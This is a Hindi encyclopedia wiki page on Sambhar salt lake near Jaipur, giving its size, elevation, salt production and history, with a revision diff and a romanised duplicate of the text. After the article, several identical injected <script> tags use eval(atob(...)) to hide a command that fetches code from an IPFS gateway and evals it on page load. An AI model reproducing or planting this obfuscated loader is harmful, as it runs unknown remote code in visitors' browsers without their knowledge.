Difference between revisions of "सांभर झील जयपुर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "Category:जयपुर के पर्यटन स्थल" to "==अन्य लिंक== {{जयपुर के पर्यटन स्थल}} Category:जयपुर के पर्यटन स्थल")
m (Text replacement - "पश्चात " to "पश्चात् ")
 
(21 intermediate revisions by 9 users not shown)
Line 1: Line 1:
देश की सबसे बडी खारे पानी की झील सांभर नमक के सबसे बडे स्‍त्रोत होने के साथ ही पर्यटन की दृष्टि से भी अत्‍यन्‍त आकर्षक स्‍थल है। उत्‍तरी भारत के चौहान राजाओं की प्रथम राजधानी [[सांभर]] पौराणिक दृष्टि से भी महत्‍वपूर्ण है। यहां पर [[शाकंम्‍भरी मंदिर जयपुर|शाकंम्‍भरी माता का मंदिर]] है।
+
{{सूचना बक्सा झील
 +
|चित्र=Gadwall-In-Sambhar-Salt-Lake.jpg
 +
|चित्र का नाम=सांभर झील
 +
|नाम=सांभर झील, [[जयपुर]]
 +
|प्रकार=
 +
|देश=[[भारत]]
 +
|राज्य=[[राजस्थान]]
 +
|नगर=[[जयपुर]]
 +
|निर्देशांक=
 +
|अधिकतम लंबाई=
 +
|अधिकतम गहराई=
 +
|अधिकतम चौड़ाई=
 +
|सतह की ऊँचाई=
 +
|क्षेत्रफल=90 वर्ग (जल से भरे रहने पर)
 +
|जल क्षमता=
 +
|जल का ठहराव समय=
 +
|गूगल मानचित्र=[https://www.google.co.in/maps/dir/Jaipur,+Rajasthan/Shakambari+Jheel,+Rajasthan+341509/@26.8818812,74.9773092,11z/data=!4m13!4m12!1m5!1m1!1s0x396c4adf4c57e281:0xce1c63a0cf22e09!2m2!1d75.7872709!2d26.9124336!1m5!1m1!1s0x396c7a183183d66f:0xa6ba8911c37fa1ad!2m2!1d75.0961549!2d26.9260523 गूगल मानचित्र सांभर झील]
 +
|शीर्षक 1=स्थिति
 +
|पाठ 1= 1,200 फुट
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी='''सांभर झील''' [[जयपुर]] नगर के समीप स्थित है। यह [[लवण (रसायन विज्ञान)|लवण]] [[जल]] अर्थात 'खारे पानी' की झील है। यह देश की सबसे बडी खारे पानी की झील और [[नमक]] का सबसे बड़ा स्रोत होने के साथ ही पर्यटन की दृष्टि से भी अत्‍यन्‍त आकर्षक स्‍थल है।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 +
'''सांभर झील''' [[भारत]] के [[राजस्थान]] राज्य में [[जयपुर]] नगर के समीप स्थित है। यह [[लवण (रसायन विज्ञान)|लवण]] [[जल]] अर्थात 'खारे पानी' की झील है। यह देश की सबसे बडी खारे पानी की झील और [[नमक]] का सबसे बड़ा स्रोत होने के साथ ही पर्यटन की दृष्टि से भी अत्‍यन्‍त आकर्षक स्‍थल है। इस झील से नमक उत्पादन हेतु 'साम्भर नामक परियोजना' भी चलाई जा रही है।
  
==अन्य लिंक==
+
*[[उत्तर भारत]] के [[चौहान वंश|चौहान]] राजाओं की प्रथम राजधानी सांभर पौराणिक दृष्टि से भी महत्‍वपूर्ण है। यहाँ पर [[शाकम्भरी देवी]] का मंदिर है।
{{जयपुर के पर्यटन स्थल}}
+
*सांभर झील समुद्र तल से 1,200 फुट की ऊँचाई पर स्थित है।
[[Category:जयपुर के पर्यटन स्थल]]
+
*जब यह झील भरी रहती है, तब इसका क्षेत्रफल 90 वर्ग मील रहता है।
[[Category:राजस्थान_के_पर्यटन_स्थल]]
+
*सांभर झील में तीन नदियाँ आकर गिरती हैं।
[[Category:पर्यटन कोश]]
+
*झील से बड़े पैमाने पर [[नमक]] का उत्पादन किया जाता है।
 +
*अनुमान है कि [[अरावली पर्वतमाला|अरावली]] के शिष्ट और नाइस के गर्तों में भरा हुआ गाद ही नमक का स्रोत है। गाद में स्थित विलयशील सोडियम यौगिक [[वर्षा]] के [[जल]] में घुसकर नदियों द्वारा [[झील]] में पहुँचाता है और जल के वाष्पन के पश्चात् झील में नमक के रूप में रह जाता है।
 +
{{लेख प्रगति |आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध=}}
 +
==वीथिका==
 +
<gallery>
 +
चित्र:Sambhar-Lake-Rajasthan-2.jpg|सांभर झील, [[जयपुर]]
 +
चित्र:Sambhar-Lake-Jaipur.jpg|सांभर झील, [[जयपुर]]
 +
</gallery>
 +
 
 +
==संबंधित लेख==
 +
{{राजस्थान की झीलें}}
 +
{{भारत की झीलें}}
 +
{{राजस्थान के पर्यटन स्थल}}
 +
[[Category:राजस्थान]][[Category:जयपुर के पर्यटन स्थल]][[Category:राजस्थान_के_पर्यटन_स्थल]][[Category:पर्यटन कोश]][[Category:राजस्थान की झीलें]][[Category:भारत की झीलें]][[Category:जयपुर]]
 +
__INDEX__

Latest revision as of 07:36, 7 November 2017

saanbhar jhil jayapur
nam saanbhar jhil, jayapur
desh bharat
rajy rajasthan
nagar/zila jayapur
kshetraphal 90 varg (jal se bhare rahane par)
googal manachitr googal manachitr saanbhar jhil
sthiti 1,200 phut
any janakari saanbhar jhil jayapur nagar ke samip sthit hai. yah lavan jal arthat 'khare pani' ki jhil hai. yah desh ki sabase badi khare pani ki jhil aur namak ka sabase b da srot hone ke sath hi paryatan ki drishti se bhi ath‍yanh‍t akarshak sh‍thal hai.

saanbhar jhil bharat ke rajasthan rajy mean jayapur nagar ke samip sthit hai. yah lavan jal arthat 'khare pani' ki jhil hai. yah desh ki sabase badi khare pani ki jhil aur namak ka sabase b da srot hone ke sath hi paryatan ki drishti se bhi ath‍yanh‍t akarshak sh‍thal hai. is jhil se namak utpadan hetu 'sambhar namak pariyojana' bhi chalaee ja rahi hai.

  • uttar bharat ke chauhan rajaoan ki pratham rajadhani saanbhar pauranik drishti se bhi mahath‍vapoorn hai. yahaan par shakambhari devi ka mandir hai.
  • saanbhar jhil samudr tal se 1,200 phut ki ooanchaee par sthit hai.
  • jab yah jhil bhari rahati hai, tab isaka kshetraphal 90 varg mil rahata hai.
  • saanbhar jhil mean tin nadiyaan akar girati haian.
  • jhil se b de paimane par namak ka utpadan kiya jata hai.
  • anuman hai ki aravali ke shisht aur nais ke gartoan mean bhara hua gad hi namak ka srot hai. gad mean sthit vilayashil sodiyam yaugik varsha ke jal mean ghusakar nadiyoan dvara jhil mean pahuanchata hai aur jal ke vashpan ke pashchath jhil mean namak ke roop mean rah jata hai.
panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

vithika

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>